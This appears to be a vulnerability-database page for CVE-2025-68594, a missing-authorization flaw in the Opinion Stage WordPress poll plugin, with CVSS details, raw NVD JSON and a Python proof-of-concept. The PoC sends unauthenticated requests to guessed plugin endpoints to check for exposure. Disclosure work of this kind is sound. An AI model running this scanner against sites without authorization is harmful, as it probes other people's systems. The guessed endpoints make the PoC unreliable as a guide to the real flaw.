Security Vulnerability Report
中文
CVE-2025-68594 CVSS 5.3 MEDIUM

CVE-2025-68594

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Missing Authorization vulnerability in Opinion Stage Poll, Survey & Quiz Maker Plugin by Opinion Stage social-polls-by-opinionstage allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll, Survey & Quiz Maker Plugin by Opinion Stage: from n/a through <= 19.12.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Opinion Stage Poll, Survey & Quiz Maker Plugin <= 19.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68594 PoC - Opinion Stage Plugin Broken Access Control # Target: WordPress site with Opinion Stage Plugin <= 19.12.0 # Note: Replace TARGET_URL with actual vulnerable endpoint import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68594 Missing Authorization in Opinion Stage Plugin """ # Common Opinion Stage plugin endpoints that may be affected vulnerable_endpoints = [ "/wp-json/opinionstage/v1/polls", "/wp-json/opinionstage/v1/surveys", "/wp-json/opinionstage/v1/quizzes", "/wp-admin/admin-ajax.php?action=opinionstage_poll", "/wp-admin/admin-ajax.php?action=opinionstage_survey" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68594 - Missing Authorization Check") print("-" * 50) for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if we can access protected resources without auth if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} - Status: {response.status_code}") else: print(f"[?] Unknown: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") print("-" * 50) print("[*] PoC completed. Update the plugin to mitigate this vulnerability.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68594-poc.py <target_url>") print("Example: python cve-2025-68594-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68594", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.813", "lastModified": "2026-04-27T19:16:35.027", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Opinion Stage Poll, Survey & Quiz Maker Plugin by Opinion Stage social-polls-by-opinionstage allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Poll, Survey & Quiz Maker Plugin by Opinion Stage: from n/a through <= 19.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/social-polls-by-opinionstage/vulnerability/wordpress-poll-survey-quiz-maker-plugin-by-opinion-stage-plugin-19-12-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}